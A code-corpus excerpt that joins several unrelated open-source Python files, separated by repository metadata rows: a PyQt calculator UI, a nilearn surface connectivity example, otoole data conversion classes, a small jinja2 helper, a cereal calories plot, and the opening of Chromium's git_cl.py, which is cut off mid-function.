self.num_point.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_point.setObjectName("num_point")
self.buttonGroup.addButton(self.num_point)
self.num_0 = QtWidgets.QPushButton(self.centralwidget)
self.num_0.setGeometry(QtCore.QRect(100, 340, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_0.setFont(font)
self.num_0.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_0.setObjectName("num_0")
self.buttonGroup.addButton(self.num_0)
self.num_eq = QtWidgets.QPushButton(self.centralwidget)
self.num_eq.setGeometry(QtCore.QRect(370, 340, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_eq.setFont(font)
self.num_eq.setStyleSheet(
"background-color: rgb(170, 0, 0);\n"
"color: rgb(255, 255, 255);")
self.num_eq.setObjectName("num_eq")
self.num_division = QtWidgets.QPushButton(self.centralwidget)
self.num_division.setGeometry(QtCore.QRect(280, 340, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_division.setFont(font)
self.num_division.setStyleSheet(
"background-color: rgb(255, 85, 0);\n"
"color: rgb(255, 255, 255);")
self.num_division.setObjectName("num_division")
self.num_c = QtWidgets.QPushButton(self.centralwidget)
self.num_c.setGeometry(QtCore.QRect(370, 150, 91, 41))
font = QtGui.QFont()
font.setPointSize(20)
self.num_c.setFont(font)
self.num_c.setStyleSheet(
"background-color: rgb(255, 170, 0);\n"
"color: rgb(255, 255, 255);")
self.num_c.setObjectName("num_c")
self.num_ce = QtWidgets.QPushButton(self.centralwidget)
self.num_ce.setGeometry(QtCore.QRect(280, 150, 91, 41))
font = QtGui.QFont()
font.setPointSize(20)
self.num_ce.setFont(font)
self.num_ce.setStyleSheet(
"background-color: rgb(255, 170, 0);\n"
"color: rgb(255, 255, 255);")
self.num_ce.setShortcut("")
self.num_ce.setAutoDefault(False)
self.num_ce.setDefault(False)
self.num_ce.setFlat(False)
self.num_ce.setObjectName("num_ce")
self.num_backspace = QtWidgets.QPushButton(self.centralwidget)
self.num_backspace.setGeometry(QtCore.QRect(370, 190, 91, 51))
font = QtGui.QFont()
font.setPointSize(30)
self.num_backspace.setFont(font)
self.num_backspace.setStyleSheet(
"background-color: rgb(255, 85, 0);\n"
"color: rgb(255, 255, 255);")
self.num_backspace.setObjectName("num_backspace")
self.num_procent = QtWidgets.QPushButton(self.centralwidget)
self.num_procent.setGeometry(QtCore.QRect(370, 290, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_procent.setFont(font)
self.num_procent.setStyleSheet(
"background-color: rgb(255, 85, 0);\n"
"color: rgb(255, 255, 255);")
self.num_procent.setObjectName("num_procent")
self.num_plus_minus = QtWidgets.QPushButton(self.centralwidget)
self.num_plus_minus.setGeometry(QtCore.QRect(190, 340, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_plus_minus.setFont(font)
self.num_plus_minus.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_plus_minus.setObjectName("num_plus_minus")
self.buttonGroup.addButton(self.num_plus_minus)
self.history = QtWidgets.QLabel(self.centralwidget)
self.history.setGeometry(QtCore.QRect(10, 10, 451, 21))
font = QtGui.QFont()
font.setPointSize(12)
self.history.setFont(font)
self.history.setLayoutDirection(QtCore.Qt.LeftToRight)
self.history.setText("")
self.history.setAlignment(
QtCore.Qt.AlignRight |
QtCore.Qt.AlignTrailing |
QtCore.Qt.AlignVCenter)
self.history.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse)
self.history.setObjectName("history")
self.num_mc = QtWidgets.QPushButton(self.centralwidget)
self.num_mc.setGeometry(QtCore.QRect(10, 150, 68, 41))
font = QtGui.QFont()
font.setPointSize(20)
self.num_mc.setFont(font)
self.num_mc.setStyleSheet(
"background-color: rgb(193, 193, 193);"
"color: rgb(255, 255, 255);\n")
self.num_mc.setObjectName("num_mc")
self.num_mr = QtWidgets.QPushButton(self.centralwidget)
self.num_mr.setGeometry(QtCore.QRect(77, 150, 68, 41))
font = QtGui.QFont()
font.setPointSize(20)
self.num_mr.setFont(font)
self.num_mr.setStyleSheet(
"background-color: rgb(193, 193, 193);"
"color: rgb(255, 255, 255);\n")
self.num_mr.setObjectName("num_mr")
self.num_m_minus = QtWidgets.QPushButton(self.centralwidget)
self.num_m_minus.setGeometry(QtCore.QRect(144, 150, 68, 41))
font = QtGui.QFont()
font.setPointSize(20)
self.num_m_minus.setFont(font)
self.num_m_minus.setStyleSheet(
"background-color: rgb(193, 193, 193);"
"color: rgb(255, 255, 255);\n")
self.num_m_minus.setObjectName("num_m_minus")
self.num_sqrt = QtWidgets.QPushButton(self.centralwidget)
self.num_sqrt.setGeometry(QtCore.QRect(370, 240, 91, 51))
font = QtGui.QFont()
font.setFamily("MS Shell Dlg 2")
font.setPointSize(20)
font.setBold(False)
font.setWeight(50)
self.num_sqrt.setFont(font)
self.num_sqrt.setStyleSheet(
"background-color: rgb(255, 85, 0);\n"
"color: rgb(255, 255, 255);")
self.num_sqrt.setObjectName("num_sqrt")
self.num_m_plus = QtWidgets.QPushButton(self.centralwidget)
self.num_m_plus.setGeometry(QtCore.QRect(211, 150, 70, 41))
font = QtGui.QFont()
font.setPointSize(20)
self.num_m_plus.setFont(font)
self.num_m_plus.setStyleSheet(
"background-color: rgb(193, 193, 193);"
"color: rgb(255, 255, 255);\n")
self.num_m_plus.setObjectName("num_m_plus")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(15, 43, 20, 20))
font = QtGui.QFont()
font.setPointSize(20)
self.label.setFont(font)
self.label.setObjectName("label")
self.lcdNumber.raise_()
self.history.raise_()
self.num_mc.raise_()
self.num_mr.raise_()
self.num_m_minus.raise_()
self.num_m_plus.raise_()
self.num_ce.raise_()
self.num_c.raise_()
self.num_7.raise_()
self.num_8.raise_()
self.num_9.raise_()
self.num_plus.raise_()
self.num_backspace.raise_()
self.num_4.raise_()
self.num_5.raise_()
self.num_6.raise_()
self.num_1.raise_()
self.num_2.raise_()
self.num_3.raise_()
self.num_point.raise_()
self.num_0.raise_()
self.num_minus.raise_()
self.num_mult.raise_()
self.num_plus_minus.raise_()
self.num_division.raise_()
self.label.raise_()
self.num_sqrt.raise_()
self.num_procent.raise_()
self.num_eq.raise_()
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Калькулятор v1.1"))
self.num_1.setText(_translate("MainWindow", "1"))
self.num_2.setText(_translate("MainWindow", "2"))
self.num_3.setText(_translate("MainWindow", "3"))
self.num_plus.setText(_translate("MainWindow", "+"))
self.num_4.setText(_translate("MainWindow", "4"))
self.num_5.setText(_translate("MainWindow", "5"))
self.num_6.setText(_translate("MainWindow", "6"))
self.num_minus.setText(_translate("MainWindow", "-"))
self.num_7.setText(_translate("MainWindow", "7"))
self.num_8.setText(_translate("MainWindow", "8"))
self.num_9.setText(_translate("MainWindow", "9"))
self.num_mult.setText(_translate("MainWindow", "*"))
self.num_point.setText(_translate("MainWindow", "."))
self.num_0.setText(_translate("MainWindow", "0"))
self.num_eq.setText(_translate("MainWindow", "="))
self.num_division.setText(_translate("MainWindow", "÷"))
self.num_c.setText(_translate("MainWindow", "C"))
self.num_ce.setText(_translate("MainWindow", "CE"))
self.num_backspace.setText(_translate("MainWindow", "←"))
self.num_procent.setText(_translate("MainWindow", "%"))
self.num_plus_minus.setText(_translate("MainWindow", "+/-"))
self.num_mc.setText(_translate("MainWindow", "MC"))
self.num_mr.setText(_translate("MainWindow", "MR"))
self.num_m_minus.setText(_translate("MainWindow", "M-"))
self.num_sqrt.setText(_translate("MainWindow", "√"))
self.num_m_plus.setText(_translate("MainWindow", "M+"))
| 45.326203 | 80 | 0.616505 | [
"MIT"
] | Eqwe-Wewe/accounting-calc | gui_calculator.py | 16,968 | Python |
"""
Seed-based connectivity on the surface
=======================================
The dataset that is a subset of the enhanced NKI Rockland sample
(http://fcon_1000.projects.nitrc.org/indi/enhanced/, Nooner et al, 2012)
Resting state fMRI scans (TR=645ms) of 102 subjects were preprocessed
(https://github.com/fliem/nki_nilearn) and projected onto the Freesurfer
fsaverage5 template (Dale et al, 1999, Fischl et al, 1999). For this example
we use the time series of a single subject's left hemisphere.
The Destrieux parcellation (Destrieux et al, 2010) in fsaverage5 space as
distributed with Freesurfer is used to select a seed region in the posterior
cingulate cortex.
Functional connectivity of the seed region to all other cortical nodes in the
same hemisphere is calculated using Pearson product-moment correlation
coefficient.
The :func:`nilearn.plotting.plot_surf_stat_map` function is used
to plot the resulting statistical map on the (inflated) pial surface.
See also :ref:`for a similar example but using volumetric input data
<sphx_glr_auto_examples_03_connectivity_plot_seed_to_voxel_correlation.py>`.
See :ref:`plotting` for more details on plotting tools.
NOTE: This example needs matplotlib version higher than 1.3.1.
References
----------
Nooner et al, (2012). The NKI-Rockland Sample: A model for accelerating the
pace of discovery science in psychiatry. Frontiers in neuroscience 6, 152.
URL http://dx.doi.org/10.3389/fnins.2012.00152
Dale et al, (1999). Cortical surface-based analysis.I. Segmentation and
surface reconstruction. Neuroimage 9.
URL http://dx.doi.org/10.1006/nimg.1998.0395
Fischl et al, (1999). Cortical surface-based analysis. II: Inflation,
flattening, and a surface-based coordinate system. Neuroimage 9.
http://dx.doi.org/10.1006/nimg.1998.0396
Destrieux et al, (2010). Automatic parcellation of human cortical gyri and
sulci using standard anatomical nomenclature. NeuroImage, 53, 1.
URL http://dx.doi.org/10.1016/j.neuroimage.2010.06.010.
"""
###############################################################################
# Retrieving the data
# -------------------
# NKI resting state data from nilearn
from nilearn import datasets
nki_dataset = datasets.fetch_surf_nki_enhanced(n_subjects=1)
# The nki dictionary contains file names for the data
# of all downloaded subjects.
print(('Resting state data of the first subjects on the '
'fsaverag5 surface left hemisphere is at: %s' %
nki_dataset['func_left'][0]))
# Destrieux parcellation for left hemisphere in fsaverage5 space
destrieux_atlas = datasets.fetch_atlas_surf_destrieux()
parcellation = destrieux_atlas['map_left']
labels = destrieux_atlas['labels']
# Fsaverage5 surface template
fsaverage = datasets.fetch_surf_fsaverage5()
# The fsaverage dataset contains file names pointing to
# the file locations
print('Fsaverage5 pial surface of left hemisphere is at: %s' %
fsaverage['pial_left'])
print('Fsaverage5 inflated surface of left hemisphere is at: %s' %
fsaverage['infl_left'])
print('Fsaverage5 sulcal depth map of left hemisphere is at: %s' %
fsaverage['sulc_left'])
###############################################################################
# Extracting the seed time series
# --------------------------------
# Load resting state time series from nilearn
from nilearn import surface
timeseries = surface.load_surf_data(nki_dataset['func_left'][0])
# Extract seed region via label
pcc_region = b'G_cingul-Post-dorsal'
import numpy as np
pcc_labels = np.where(parcellation == labels.index(pcc_region))[0]
# Extract time series from seed region
seed_timeseries = np.mean(timeseries[pcc_labels], axis=0)
###############################################################################
# Calculating seed-based functional connectivity
# ----------------------------------------------
# Calculate Pearson product-moment correlation coefficient between seed
# time series and timeseries of all cortical nodes of the hemisphere
from scipy import stats
stat_map = np.zeros(timeseries.shape[0])
for i in range(timeseries.shape[0]):
stat_map[i] = stats.pearsonr(seed_timeseries, timeseries[i])[0]
# Re-mask previously masked nodes (medial wall)
stat_map[np.where(np.mean(timeseries, axis=1) == 0)] = 0
###############################################################################
# Display ROI on surface
from nilearn import plotting
plotting.plot_surf_roi(fsaverage['pial_left'], roi_map=pcc_labels,
hemi='left', view='medial',
bg_map=fsaverage['sulc_left'], bg_on_data=True,
title='PCC Seed')
###############################################################################
# Display unthresholded stat map with dimmed background
plotting.plot_surf_stat_map(fsaverage['pial_left'], stat_map=stat_map,
hemi='left', view='medial',
bg_map=fsaverage['sulc_left'], bg_on_data=True,
darkness=.5, title='Correlation map')
###############################################################################
# Display unthresholded stat map without background map, transparency is
# automatically set to .5, but can also be controlled with the alpha parameter
plotting.plot_surf_stat_map(fsaverage['pial_left'], stat_map=stat_map,
hemi='left', view='medial',
title='Plotting without background')
###############################################################################
# Many different options are available for plotting, for example thresholding,
# or using custom colormaps
plotting.plot_surf_stat_map(fsaverage['pial_left'], stat_map=stat_map,
hemi='left', view='medial',
bg_map=fsaverage['sulc_left'], bg_on_data=True,
cmap='Spectral', threshold=.5,
title='Threshold and colormap')
###############################################################################
# The plots can be saved to file, in which case the display is closed after
# creating the figure
plotting.plot_surf_stat_map(fsaverage['infl_left'], stat_map=stat_map,
hemi='left', bg_map=fsaverage['sulc_left'],
bg_on_data=True, threshold=.6,
output_file='plot_surf_stat_map.png')
plotting.show()
| 40.791139 | 79 | 0.636618 | [
"BSD-2-Clause"
] | QinglinDong/nilearn-deep | examples/01_plotting/plot_surf_stat_map.py | 6,445 | Python |
import logging
import sys
from abc import abstractmethod
from typing import TextIO
import pandas as pd
from datapackage import Package
from pandas_datapackage_reader import read_datapackage
from sqlalchemy import create_engine
from otoole import read_packaged_file
logger = logging.getLogger(__name__)
class DataPackageTo(object):
"""Convert a data package to another format
Arguments
---------
datapackage: str
The path to the databackage
datafilepath: str
The path to the destination file or folder
sql: bool, default=False
Flag to set whether the source datapackage is in sqlite format
"""
def __init__(self, datapackage: str, datafilepath: str, sql: bool = False):
self.datapackage = datapackage
self.datafilepath = datafilepath
self.sql = sql
self.package = self._get_package()
self.default_values = self._get_default_values()
self.config = read_packaged_file("config.yaml", "otoole.preprocess")
def _get_package(self):
if self.sql:
engine = create_engine("sqlite:///{}".format(self.datapackage))
package = Package(storage="sql", engine=engine)
else:
package = read_datapackage(self.datapackage) # typing: datapackage.Package
return package
def _get_default_values(self):
default_resource = (
self.package.pop("default_values").set_index("name").to_dict()
)
return default_resource["default_value"]
def convert(self):
"""Perform the conversion from datapackage to destination format
"""
handle = self._header()
logger.debug(self.default_values)
for name, df in self.package.items():
logger.debug(name)
if df.empty:
columns = [x["name"] for x in df._metadata["schema"]["fields"]]
df = pd.DataFrame(columns=columns)
df = df.reset_index()
if "index" in df.columns:
df = df.drop(columns="index")
logger.debug("Number of columns: %s, %s", len(df.columns), df.columns)
if len(df.columns) > 1:
default_value = self.default_values[name]
self._write_parameter(df, name, handle, default=default_value)
else:
self._write_set(df, name, handle)
self._footer(handle)
handle.close()
@abstractmethod
def _header(self) -> TextIO:
raise NotImplementedError()
@abstractmethod
def _write_parameter(
self, df: pd.DataFrame, parameter_name: str, handle: TextIO, default: float
) -> pd.DataFrame:
"""Write parameter data"""
raise NotImplementedError()
@abstractmethod
def _write_set(self, df: pd.DataFrame, set_name, handle: TextIO) -> pd.DataFrame:
"""Write set data"""
raise NotImplementedError()
@abstractmethod
def _footer(self, handle: TextIO):
raise NotImplementedError()
class DataPackageToCsv(DataPackageTo):
def _header(self):
filepath = open(self.datafilepath, "w")
msg = "# Model file written by *otoole*\n"
filepath.write(msg)
return filepath
def _form_parameter(self, df: pd.DataFrame, default: float):
df = df[df.VALUE != default]
return df
def _write_parameter(
self, df: pd.DataFrame, parameter_name: str, handle: TextIO, default: float
):
"""Write parameter data to a csv file, omitting data which matches the default value
Arguments
---------
filepath : StreamIO
df : pandas.DataFrame
parameter_name : str
handle: TextIO
default : int
"""
df = self._form_parameter(df, default)
handle.write("param default {} : {} :=\n".format(default, parameter_name))
df.to_csv(path_or_buf=handle, sep=" ", header=False, index=False)
handle.write(";\n")
def _write_set(self, df: pd.DataFrame, set_name, handle: TextIO):
"""
Arguments
---------
df : pandas.DataFrame
set_name : str
handle: TextIO
"""
handle.write("set {} :=\n".format(set_name))
df.to_csv(path_or_buf=handle, sep=" ", header=False, index=False)
handle.write(";\n")
def _footer(self, handle: TextIO):
handle.write("end;\n")
handle.close()
class DataPackageToExcel(DataPackageTo):
def _header(self):
return pd.ExcelWriter(self.datafilepath, mode="w")
def _form_parameter(
self, df: pd.DataFrame, parameter_name: str, default: float
) -> pd.DataFrame:
"""Converts data into wide format
Arguments
---------
df: pd.DataFrame
parameter_name: str
default: float
Returns
-------
pandas.DataFrame
"""
if not df.empty:
names = df.columns.to_list()
if len(names) > 2:
logger.debug(
"More than 2 columns for {}: {}".format(parameter_name, names)
)
rows = names[0:-2]
columns = names[-2]
values = names[-1]
logger.debug("Rows: {}; columns: {}; values: {}", rows, columns, values)
logger.debug("dtypes: {}".format(df.dtypes))
pivot = pd.pivot_table(
df, index=rows, columns=columns, values=values, fill_value=default
)
elif len(names) == 2:
logger.debug("Two columns for {}: {}".format(parameter_name, names))
values = names[-1]
rows = names[0:-2]
logger.debug("Rows: {}; values: {}", rows, values)
pivot = pd.pivot_table(
df, index=rows, values=values, fill_value=default
)
else:
logger.debug("One column for {}: {}".format(parameter_name, names))
pivot = df.copy()
pivot = pivot.reset_index(drop=True)
else:
logger.debug("Dataframe {} is empty".format(parameter_name))
pivot = df.copy()
return pivot
def _write_parameter(
self,
df: pd.DataFrame,
parameter_name: str,
handle: pd.ExcelWriter,
default: float,
):
df = self._form_parameter(df, parameter_name, default)
df.to_excel(handle, sheet_name=parameter_name, merge_cells=False)
def _write_set(self, df: pd.DataFrame, set_name, handle: pd.ExcelWriter):
df.to_excel(handle, sheet_name=set_name, merge_cells=False, index=False)
def _footer(self, handle=pd.ExcelWriter):
handle.close()
def convert_datapackage_to_datafile(path_to_datapackage, path_to_datafile):
dp = DataPackageToCsv(path_to_datapackage, path_to_datafile)
dp.convert()
def convert_datapackage_to_excel(path_to_datapackage, path_to_excel):
dp = DataPackageToExcel(path_to_datapackage, path_to_excel)
dp.convert()
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
path_to_datapackage = sys.argv[1]
path_to_datafile = sys.argv[2]
DataPackageToCsv(path_to_datapackage, path_to_datafile)
| 30.425 | 92 | 0.598877 | [
"MIT"
] | chrwm/otoole | src/otoole/preprocess/narrow_to_datafile.py | 7,302 | Python |
from __future__ import absolute_import
from jinja2 import Environment
def environment(**kwargs):
extensions = [] if 'extensions' not in kwargs else kwargs['extensions']
extensions.append('sass_processor.jinja2.ext.SassSrc')
kwargs['extensions'] = extensions
return Environment(**kwargs)
| 25.583333 | 75 | 0.749186 | [
"MIT"
] | AstraLuma/django-sass-processor | tests/jinja2.py | 307 | Python |
# Data from https://www.kaggle.com/crawford/80-cereals/version/2
import pandas, matplotlib
data = pandas.read_csv('http://www.compassmentis.com/wp-content/uploads/2019/04/cereal.csv')
data = data.set_index('name')
data = data.calories.sort_values()[-10:]
ax = data.plot(kind='barh')
ax.set_xlabel('Calories per serving')
ax.set_ylabel('Cereal')
ax.set_title('Top 10 cereals by calories')
matplotlib.pyplot.subplots_adjust(left=0.25)
matplotlib.pyplot.show()
| 38.166667 | 92 | 0.766376 | [
"MIT"
] | CompassMentis/practical_python_in_10_lines | read_csv_and_plot/read_and_plot.py | 458 | Python |
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Copyright (C) 2008 Evan Martin <[email protected]>
"""A git-command for integrating reviews on Rietveld and Gerrit."""
from __future__ import print_function
from distutils.version import LooseVersion
from multiprocessing.pool import ThreadPool
import base64
import collections
import glob
import httplib
import json
import logging
import multiprocessing
import optparse
import os
import re
import stat
import sys
import textwrap
import time
import traceback
import urllib
import urllib2
import urlparse
import uuid
import webbrowser
import zlib
try:
import readline # pylint: disable=F0401,W0611
except ImportError:
pass
from third_party import colorama
from third_party import httplib2
from third_party import upload
import auth
from luci_hacks import trigger_luci_job as luci_trigger
import clang_format
import commit_queue
import dart_format
import setup_color
import fix_encoding
import gclient_utils
import gerrit_util
import git_cache
import git_common
import git_footers
import owners
import owners_finder
import presubmit_support
import rietveld
import scm
import subcommand
import subprocess2
import watchlists
__version__ = '2.0'
COMMIT_BOT_EMAIL = '[email protected]'
DEFAULT_SERVER = 'https://codereview.appspot.com'
POSTUPSTREAM_HOOK_PATTERN = '.git/hooks/post-cl-%s'
DESCRIPTION_BACKUP_FILE = '~/.git_cl_description_backup'
GIT_INSTRUCTIONS_URL = 'http://code.google.com/p/chromium/wiki/UsingGit'
REFS_THAT_ALIAS_TO_OTHER_REFS = {
'refs/remotes/origin/lkgr': 'refs/remotes/origin/master',
'refs/remotes/origin/lkcr': 'refs/remotes/origin/master',
}
# Valid extensions for files we want to lint.
DEFAULT_LINT_REGEX = r"(.*\.cpp|.*\.cc|.*\.h)"
DEFAULT_LINT_IGNORE_REGEX = r"$^"
# Shortcut since it quickly becomes redundant.
Fore = colorama.Fore
# Initialized in main()
settings = None
def DieWithError(message):
print(message, file=sys.stderr)
sys.exit(1)
def GetNoGitPagerEnv():
env = os.environ.copy()
# 'cat' is a magical git string that disables pagers on all platforms.
env['GIT_PAGER'] = 'cat'
return env
def RunCommand(args, error_ok=False, error_message=None, shell=False, **kwargs):
try:
return subprocess2.check_output(args, shell=shell, **kwargs)
except subprocess2.CalledProcessError as e:
logging.debug('Failed running %s', args)
if not error_ok:
DieWithError(
'Command "%s" failed.\n%s' % (
' '.join(args), error_message or e.stdout or ''))
return e.stdout
def RunGit(args, **kwargs):
"""Returns stdout."""
return RunCommand(['git'] + args, **kwargs)
def RunGitWithCode(args, suppress_stderr=False):
"""Returns return code and stdout."""
try:
if suppress_stderr:
stderr = subprocess2.VOID
else:
stderr = sys.stderr
out, code = subprocess2.communicate(['git'] + args,
env=GetNoGitPagerEnv(),
stdout=subprocess2.PIPE,
stderr=stderr)
return code, out[0]
except ValueError:
# When the subprocess fails, it returns None. That triggers a ValueError
# when trying to unpack the return value into (out, code).
return 1, ''
def RunGitSilent(args):
"""Returns stdout, suppresses stderr and ignores the return code."""
return RunGitWithCode(args, suppress_stderr=True)[1]
def IsGitVersionAtLeast(min_version):
prefix = 'git version '
version = RunGit(['--version']).strip()
return (version.startswith(prefix) and
LooseVersion(version[len(prefix):]) >= LooseVersion(min_version))
def BranchExists(branch):
"""Return True if specified branch exists."""
code, _ = RunGitWithCode(['rev-parse', '--verify', branch],
suppress_stderr=True)
return not code
def ask_for_data(prompt):
try:
return raw_input(prompt)
except KeyboardInterrupt:
# Hide the exception.
sys.exit(1)
def git_set_branch_value(key, value):
branch = GetCurrentBranch()
if not branch:
return
cmd = ['config']
if isinstance(value, int):
cmd.append('--int')
git_key = 'branch.%s.%s' % (branch, key)
RunGit(cmd + [git_key, str(value)])
def git_get_branch_default(key, default):
branch = GetCurrentBranch()
if branch:
git_key = 'branch.%s.%s' % (branch, key)
(_, stdout) = RunGitWithCode(['config', '--int', '--get', git_key])
try:
return int(stdout.strip())
except ValueError:
pass
return default
def add_git_similarity(parser):
parser.add_option(
'--similarity', metavar='SIM', type='int', action='store',
help='Sets the percentage that a pair of files need to match in order to'
' be considered copies (default 50)')
parser.add_option(
'--find-copies', action='store_true',
help='Allows git to look for copies.')
parser.add_option(
'--no-find-copies', action='store_false', dest='find_copies',
help='Disallows git from looking for copies.')
old_parser_args = parser.parse_args
def Parse(args):
options, args = old_parser_args(args)
if options.similarity is None:
options.similarity = git_get_branch_default('git-cl-similarity', 50)
else:
print('Note: Saving similarity of %d%% in git config.'
% options.similarity)
git_set_branch_value('git-cl-similarity', options.similarity)
options.similarity = max(0, min(options.similarity, 100))
if options.find_copies is None:
options.find_copies = bool(
git_get_branch_default('git-find-copies', True))
else:
git_set_branch_value('git-find-copies', int(options.find_copies))
print('Using %d%% similarity for rename/copy detection. '
'Override with --similarity.' % options.similarity)
return options, args
parser.parse_args = Parse
def _get_properties_from_options(options):
properties = dict(x.split('=', 1) for x in options.properties)
for key, val in properties.iteritems():
try:
properties[key] = json.loads(val)
except ValueError:
pass # If a value couldn't be evaluated, treat it as a string.
return properties
def _prefix_master(master):
"""Convert user-specified master name to full master name.
Buildbucket uses full master name(master.tryserver.chromium.linux) as bucket
name, while the developers always use shortened master name
(tryserver.chromium.linux) by stripping off the prefix 'master.'. This
function does the conversion for buildbucket migration.
"""
prefix = 'master.'
if master.startswith(prefix):
return master
return '%s%s' % (prefix, master)
def _buildbucket_retry(operation_name, http, *args, **kwargs):
"""Retries requests to buildbucket service and returns parsed json content."""
try_count = 0
while True:
response, content = http.request(*args, **kwargs)
try:
content_json = json.loads(content)
except ValueError:
content_json = None
# Buildbucket could return an error even if status==200.
if content_json and content_json.get('error'):
error = content_json.get('error')
if error.get('code') == 403:
raise BuildbucketResponseException(
'Access denied: %s' % error.get('message', ''))
msg = 'Error in response. Reason: %s. Message: %s.' % (
error.get('reason', ''), error.get('message', ''))
raise BuildbucketResponseException(msg)
if response.status == 200:
if not content_json:
raise BuildbucketResponseException(
'Buildbucket returns invalid json content: %s.\n'
'Please file bugs at http://crbug.com, label "Infra-BuildBucket".' %
content)
return content_json
if response.status < 500 or try_count >= 2:
raise httplib2.HttpLib2Error(content)
# status >= 500 means transient failures.
logging.debug('Transient errors when %s. Will retry.', operation_name)
time.sleep(0.5 + 1.5*try_count)
try_count += 1
assert False, 'unreachable'
def trigger_luci_job(changelist, masters, options):
"""Send a job to run on LUCI."""
issue_props = changelist.GetIssueProperties()
issue = changelist.GetIssue()
patchset = changelist.GetMostRecentPatchset()
for builders_and_tests in sorted(masters.itervalues()):
# TODO(hinoka et al): add support for other properties.
# Currently, this completely ignores testfilter and other properties.
for builder in sorted(builders_and_tests):
luci_trigger.trigger(
builder, 'HEAD', issue, patchset, issue_props['project'])
def trigger_try_jobs(auth_config, changelist, options, masters, category):
rietveld_url = settings.GetDefaultServerUrl()
rietveld_host = urlparse.urlparse(rietveld_url).hostname
authenticator = auth.get_authenticator_for_host(rietveld_host, auth_config)
http = authenticator.authorize(httplib2.Http())
http.force_exception_to_status_code = True
issue_props = changelist.GetIssueProperties()
issue = changelist.GetIssue()
patchset = changelist.GetMostRecentPatchset()
properties = _get_properties_from_options(options)
buildbucket_put_url = (
'https://{hostname}/_ah/api/buildbucket/v1/builds/batch'.format(
hostname=options.buildbucket_host))
buildset = 'patch/rietveld/{hostname}/{issue}/{patch}'.format(
hostname=rietveld_host,
issue=issue,
patch=patchset)
batch_req_body = {'builds': []}
print_text = []
print_text.append('Tried jobs on:')
for master, builders_and_tests in sorted(masters.iteritems()):
print_text.append('Master: %s' % master)
bucket = _prefix_master(master)
for builder, tests in sorted(builders_and_tests.iteritems()):
print_text.append(' %s: %s' % (builder, tests))
parameters = {
'builder_name': builder,
'changes': [{
'author': {'email': issue_props['owner_email']},
'revision': options.revision,
}],
'properties': {
'category': category,
'issue': issue,
'master': master,
'patch_project': issue_props['project'],
'patch_storage': 'rietveld',
'patchset': patchset,
'reason': options.name,
'rietveld': rietveld_url,
},
}
if 'presubmit' in builder.lower():
parameters['properties']['dry_run'] = 'true'
if tests:
parameters['properties']['testfilter'] = tests
if properties:
parameters['properties'].update(properties)
if options.clobber:
parameters['properties']['clobber'] = True
batch_req_body['builds'].append(
{
'bucket': bucket,
'parameters_json': json.dumps(parameters),
'client_operation_id': str(uuid.uuid4()),
'tags': ['builder:%s' % builder,
'buildset:%s' % buildset,
'master:%s' % master,
'user_agent:git_cl_try']
}
)
_buildbucket_retry(
'triggering tryjobs',
http,
buildbucket_put_url,
'PUT',
body=json.dumps(batch_req_body),
headers={'Content-Type': 'application/json'}
)
print_text.append('To see results here, run: git cl try-results')
print_text.append('To see results in browser, run: git cl web')
print('\n'.join(print_text))
def fetch_try_jobs(auth_config, changelist, options):
"""Fetches tryjobs from buildbucket.
Returns a map from build id to build info as json dictionary.
"""
rietveld_url = settings.GetDefaultServerUrl()
rietveld_host = urlparse.urlparse(rietveld_url).hostname
authenticator = auth.get_authenticator_for_host(rietveld_host, auth_config)
if authenticator.has_cached_credentials():
http = authenticator.authorize(httplib2.Http())
else:
print('Warning: Some results might be missing because %s' %
# Get the message on how to login.
(auth.LoginRequiredError(rietveld_host).message,))
http = httplib2.Http()
http.force_exception_to_status_code = True
buildset = 'patch/rietveld/{hostname}/{issue}/{patch}'.format(
hostname=rietveld_host,
issue=changelist.GetIssue(),
patch=options.patchset)
params = {'tag': 'buildset:%s' % buildset}
builds = {}
while True:
url = 'https://{hostname}/_ah/api/buildbucket/v1/search?{params}'.format(
hostname=options.buildbucket_host,
params=urllib.urlencode(params))
content = _buildbucket_retry('fetching tryjobs', http, url, 'GET')
for build in content.get('builds', []):
builds[build['id']] = build
if 'next_cursor' in content:
params['start_cursor'] = content['next_cursor']
else:
break
return builds
def print_tryjobs(options, builds):
"""Prints nicely result of fetch_try_jobs."""
if not builds:
print('No tryjobs scheduled')
return
# Make a copy, because we'll be modifying builds dictionary.
builds = builds.copy()
builder_names_cache = {}
def get_builder(b):
try:
return builder_names_cache[b['id']]
except KeyError:
try:
parameters = json.loads(b['parameters_json'])
name = parameters['builder_name']
except (ValueError, KeyError) as error:
print('WARNING: failed to get builder name for build %s: %s' % (
b['id'], error))
name = None
builder_names_cache[b['id']] = name
return name
def get_bucket(b):
bucket = b['bucket']
if bucket.startswith('master.'):
return bucket[len('master.'):]
return bucket
if options.print_master:
name_fmt = '%%-%ds %%-%ds' % (
max(len(str(get_bucket(b))) for b in builds.itervalues()),
max(len(str(get_builder(b))) for b in builds.itervalues()))
def get_name(b):
return name_fmt % (get_bucket(b), get_builder(b))
else:
name_fmt = '%%-%ds' % (
max(len(str(get_builder(b))) for b in builds.itervalues()))
def get_name(b):
return name_fmt % get_builder(b)
def sort_key(b):
return b['status'], b.get('result'), get_name(b), b.get('url')
def pop(title, f, color=None, **kwargs):
"""Pop matching builds from `builds` dict and print them."""
if not options.color or color is None:
colorize = str
else:
